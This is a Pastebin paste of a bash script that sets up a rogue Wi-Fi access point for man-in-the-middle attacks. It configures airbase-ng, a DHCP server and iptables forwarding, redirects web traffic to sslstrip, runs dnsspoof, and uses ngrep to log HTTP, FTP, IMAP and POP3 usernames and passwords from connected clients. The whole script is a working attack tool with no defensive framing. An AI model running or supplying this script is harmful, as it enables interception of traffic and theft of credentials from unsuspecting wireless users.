Guest User

Untitled

a guest
Nov 23rd, 2017
85
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.32 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3. ###########################################################################################################
  4. #---------------------------- Configuration Stuff --------------------------------------------------------#
  5. ###########################################################################################################
  6. ESSID=linksys # default value... can be changed at runtime with -e <ssid>
  7. MON=mon0
  8. CHAN=6
  9. INT=eth1
  10. GATEWAY=`/sbin/ip route | awk '/default/ { print $3 }' | head -1`
  11.  
  12. # Strip SSL? Modify arguments or comment out to disable
  13. SSLSTRIP="python /pentest/web/sslstrip/sslstrip.py "
  14. SSTRIPARGS="-f -a -w /tmp/sslstrip"
  15. #---------------------------------
  16.  
  17. IPSTART=10.0.0.16
  18. IPEND=10.0.0.55
  19. ROUTER=10.0.0.1
  20. SUBNET=10.0.0.0
  21. BROADCAST=10.0.0.0
  22. NETMASK=255.255.255.0
  23. DNS=10.0.0.1
  24.  
  25. DHCP="authoritative;\n\
  26. ddns-update-style ad-hoc;\n\
  27. subnet $SUBNET netmask $NETMASK {\n\
  28. allow unknown-clients;\n\
  29. default-lease-time 600;\n\
  30. max-lease-time 7200;\n\
  31. option subnet-mask $NETMASK;\n\
  32. option broadcast-address $BROADCAST;\n\
  33. option routers $ROUTER;\n\
  34. option domain-name-servers $DNS;\n\
  35. range dynamic-bootp $IPSTART $IPEND;\n\
  36. }"
  37. # Password Logging
  38. HTTPLOG=/tmp/http.pcap
  39. FTPLOG=/tmp/ftp.pcap
  40. POP3LOG=/tmp/pop3.pcap
  41. IMAPLOG=/tmp/imap.pcap
  42.  
  43. #--------------------------- END OF CONFIGURATION ----------------------------
  44. ##-- Handle Arguments
  45. if [ $1 = "-e" ]
  46. then
  47. ESSID=$2
  48. fi
  49. ###########################################################################################################
  50. #----------------------------- Splash Screen -------------------------------------------------------------#
  51. ###########################################################################################################
  52. echo -e "\033[31;4m \033[0m"
  53. echo -e "\033[31;4m*******************************************************************\033[0m"
  54. echo -e "\033[29;1m _ __ \033[0m"
  55. echo -e "\033[29;1m ____ ___ (_) /_____ ___ \033[0m"
  56. echo -e "\033[29;1m / __ \`__ \/ / __/ __ \`__ \ \033[0m"
  57. echo -e "\033[29;1m / / / / / / / /_/ / / / / /\033[0m"
  58. echo -e "\033[29;1m /_/ /_/ /_/_/\__/_/ /_/ /_/ \033[0m"
  59. echo -e "\033[29;1m ___ ______ _ _ \033[0m"
  60. echo -e "\033[29;1m / _ \ | ___ \ (_) | | \033[0m"
  61. echo -e "\033[29;1m / /_\ \ ___ ___ ___ ___ ___ | |_/ /__ _ _ __ | |_ \033[0m"
  62. echo -e "\033[29;1m | _ |/ __/ __/ _ \/ __/ __| | __/ _ \| | '_ \| __| \033[0m"
  63. echo -e "\033[29;1m | | | | (_| (_| __/\__ \__ \ | | | (_) | | | | | |_ \033[0m"
  64. echo -e "\033[29;1m \_| |_/\___\___\___||___/___/ \_| \___/|_|_| |_|\__| \033[0m"
  65.  
  66. echo -e "\033[31;1m \033[0m"
  67. echo -e " \033[31;4mCurrent Configuration:\033[0m"
  68. echo -e "\033[31;1m ESSID: \033[34;1m$ESSID\033[31;1m Channel:\033[34;1m$CHAN\033[31;1m \033[0m"
  69. echo -e "\033[31;1m Bridged Interface: \033[34;1m$INT\033[31;1m \033[0m"
  70. echo -e "\033[31;1m Default Gateway: \033[34;1m$GATEWAY\033[31;1m \033[0m"
  71. echo -e "\033[31;1m DHCP Range: \033[34;1m$IPSTART\033[31;1m - \033[34;1m$IPEND\033[31;1m \033[0m"
  72. echo -e "\033[31;1m Soft-Router IP: \033[34;1m$ROUTER\033[31;1m \033[0m"
  73. echo -e "\033[31;1m Subnet: \033[34;1m$SUBNET\033[31;1m Broadcast: \033[34;1m$BROADCAST\033[31;1m \033[0m"
  74. echo -e "\033[31;1m Netmask: \033[34;1m$NETMASK DNS: \033[34;1m$DNS\033[31;1m \033[0m"
  75.  
  76. if [ -n "${SSLSTRIP+x}" ]
  77. then
  78. echo -e "\033[31;1m Strip SSL: \033[34;1mYes\033[31;1m Args: \033[34;1m$SSTRIPARGS\033[31;1m \033[0m"
  79. else
  80. echo -e "\033[31;1m Strip SSL: \033[34;1mNo \033[0m"
  81. fi
  82.  
  83. echo ""
  84. echo -e "\033[29;1m !!!!! Confirm wifi card is in monitor mode at $MON !!!!!! \033[0m"
  85. echo -e "\033[31;1m CTRL-C to Cancel \033[0m"
  86. echo -e "\033[32;1m Press Enter to continue... \033[0m"
  87. echo -e "\033[31;4m \033[0m"
  88. echo -e "\033[31;4m******************************************************************\033[0m"
  89. read
  90.  
  91. ###########################################################################################################
  92. #------------------------------ Running Commands ---------------------------------------------------------#
  93. ###########################################################################################################
  94. echo -e "\033[32;1mStarting fake accesspoint with ESSID $ESSID\033[0m"
  95. #gnome-terminal -e "airbase-ng -c $CHAN -e $ESSID $MON"
  96. gnome-terminal -e "airbase-ng -w 01234ABCD0 -c $CHAN -e $ESSID $MON"
  97. sleep 5
  98. echo -e "\033[32;1mConfiguring Tap Interface at0\033[0m"
  99. ifconfig at0 up
  100. ifconfig at0 $ROUTER netmask $NETMASK
  101. ifconfig at0 mtu 1400
  102. echo -e "\033[32;1mSetting up forwarding and routing\033[0m"
  103. route add -net $SUBNET netmask $NETMASK gw $ROUTER
  104. echo 1 > /proc/sys/net/ipv4/ip_forward
  105. iptables -t nat -A POSTROUTING -o $INT -j MASQUERADE
  106. iptables -A FORWARD -i at0 -j ACCEPT
  107. iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.200.2
  108. echo -e "\033[32;1mStarting DHCP Server on at0\033[0m"
  109. mv /etc/dhcp3/dhcpd.conf /etc/dhcpd.conf.old
  110. echo -e $DHCP > /etc/dhcp3/dhcpd.conf
  111. killall dhcpd3 &> /dev/null
  112. gnome-terminal -e "dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0"
  113. if [ -n "${SSLSTRIP+x}" ]
  114. then
  115. echo -e "\033[32;1mStarting SSL Strip\033[0m"
  116. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  117. $SSLSTRIP$SSTRIPARGS &> /dev/null &
  118. echo -e "\033[32;1mStarting DNS Spoofing on at0\033[0m"
  119. /usr/local/sbin/dnsspoof -i at0 &> /dev/null &
  120. fi
  121. echo -e "\033[32;1mLogging packet captures containing credentials\033[0m"
  122. ngrep -O $HTTPLOG -d at0 -i '^(GET|POST)' tcp port 80 > /dev/null&
  123. ngrep -O $FTPLOG -d at0 -i '^(USER|PASS)' tcp port 21 > /dev/null&
  124. ngrep -O $IMAPLOG -d at0 -i '^(a login )' tcp port 143 > /dev/null&
  125. ngrep -O $POP3LOG -d at0 -i '^(USER|PASS)' tcp port 110 > /dev/null&
  126. ###########################################################################################################
  127. #---------------------------------------Cleanup Stuff-----------------------------------------------------#
  128. ###########################################################################################################
  129. echo -e "\033[31;1m*******************************************************************\033[0m"
  130. echo -e "\033[31;1m Press Enter to Gracefully Exit\033[0m"
  131. echo -e "\033[31;1m*******************************************************************\033[0m"
  132. read
  133. killall ngrep > /dev/null
  134. killall airbase-ng
  135. killall dhcpd3
  136. if [ -n "${SSLSTRIP+x}" ]
  137. then
  138. kill $(ps aux | grep -m 1 "python /pentest/web/sslstrip/sslstrip.py" | awk '{print $2}') #kill sslstrip
  139. killall dnsspoof #kill dnsspoof
  140. fi
  141. # Reset networking stuff
  142. iptables --flush
  143. iptables --table nat --flush
  144. iptables --delete-chain
  145. iptables --table nat --delete-chain
  146. echo 0 > /proc/sys/net/ipv4/ip_forward
Add Comment
Please, Sign In to add comment